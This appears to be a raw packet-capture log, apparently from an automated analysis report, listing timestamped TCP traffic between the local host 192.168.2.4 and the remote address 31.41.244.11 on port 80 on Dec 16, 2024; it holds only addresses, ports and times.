                                                                                                                                                                                              Dec 16, 2024 01:01:34.954097033 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.954148054 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.954207897 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.954247952 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.959084988 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.959175110 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.959233999 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.959291935 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.963912964 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.963973045 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.964041948 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.964091063 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.968729973 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.968787909 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.968854904 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.968905926 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.973545074 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.973681927 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.973731995 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.088529110 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.088567972 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.088587046 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.088619947 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.093293905 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.093332052 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.093374968 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.208086014 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.208127022 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.208139896 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.208164930 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.212913990 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.212949991 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.212965012 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.212992907 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.327722073 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.327742100 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.327756882 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.327775002 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.327784061 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.327792883 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.327810049 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.327814102 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.327828884 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.327853918 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.328125954 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.328150034 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.328175068 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.328191996 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.328197002 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.328208923 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.328216076 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.328237057 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.328254938 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.328953981 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.328972101 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.328999996 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.329014063 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.329031944 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.329144955 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.329901934 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.329920053 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.329946041 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.329958916 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.331671953 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.331687927 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.331703901 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.331720114 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.331722975 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.331741095 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.331752062 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.332535982 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.332559109 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.332576036 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.332580090 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.332593918 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.332598925 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.332611084 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.332617044 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.332628965 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.332638025 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.332648993 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.332664013 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.333364964 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.333384037 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.333400011 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.333417892 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.333422899 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.333436012 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.333456039 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.333472013 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334158897 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334207058 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334404945 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334420919 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334436893 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334446907 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334455967 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334460020 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334470987 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334477901 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334489107 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334491968 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334516048 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334516048 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.334527969 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.335275888 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.335293055 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.335309029 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.335331917 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.335336924 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.335347891 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.335374117 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.335386038 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336132050 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336152077 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336169004 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336182117 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336186886 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336196899 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336205006 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336224079 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336230993 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336241007 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336255074 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336278915 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336982012 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.336998940 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.337014914 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.337030888 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.337037086 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.337057114 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.337085962 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.337920904 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.337938070 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.337954044 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.337970018 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.337987900 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.338011026 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.447633982 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.447721004 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.447776079 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.450001955 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.450052023 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.450120926 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.450177908 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.454824924 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.454876900 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.454936028 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.455001116 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.459712029 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.459749937 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.459773064 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.459800005 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.464489937 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.464540005 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.464600086 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.464647055 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.469347000 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.469455957 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.469502926 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.472290039 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.472414970 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.472470045 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.475310087 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.475378990 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.475393057 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.475594044 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.478317976 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.478370905 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.478468895 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.478509903 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.481333971 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.481388092 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.481409073 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.481456041 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.484281063 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.484334946 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.484401941 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.484530926 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.487292051 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.487410069 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.487466097 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.490317106 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.490365028 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.490433931 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.490487099 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.493257046 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.493309021 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.493412971 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.493458986 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.496262074 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.496306896 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.496367931 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.496412992 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.499239922 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.499291897 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.499388933 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.499439955 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.502265930 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.502319098 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.502376080 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.502530098 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.505230904 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.505348921 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.505398035 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.508214951 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.508280039 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.508346081 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.508395910 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.511214972 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.511276007 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.511348963 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.511399984 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.516741037 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.516782045 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.516808033 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.516822100 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.518371105 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.518419027 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.518572092 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.518723965 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.521358013 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.521451950 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.521559954 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.521608114 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.524301052 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.524354935 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.524461985 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.524548054 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.526346922 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.526365042 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.526407003 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.529160976 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.529202938 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.529292107 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.529336929 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.532176018 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.532217979 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.532258034 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.532299995 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.535182953 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.535219908 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.535275936 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.535398960 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.538155079 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.538249969 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.538276911 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.538312912 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.541146040 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.541249990 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.541263103 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.541301966 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.544189930 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.544329882 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.544343948 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.544384003 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.547123909 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.547235012 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.547244072 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.547282934 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.550132990 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.550174952 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.550234079 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.550278902 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.553118944 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.553302050 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.553323030 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.553416014 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.556148052 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.556195021 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.567719936 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.567828894 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.567841053 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.567893028 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.569173098 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.569312096 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.569363117 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.572168112 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.573529005 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.573661089 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.573708057 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.573788881 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.573828936 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.576704025 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.576819897 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.576869011 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.579670906 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.579715014 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.579791069 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.579854012 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.582659960 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.582721949 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.582781076 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.582849026 CET4982980192.168.2.431.41.244.11
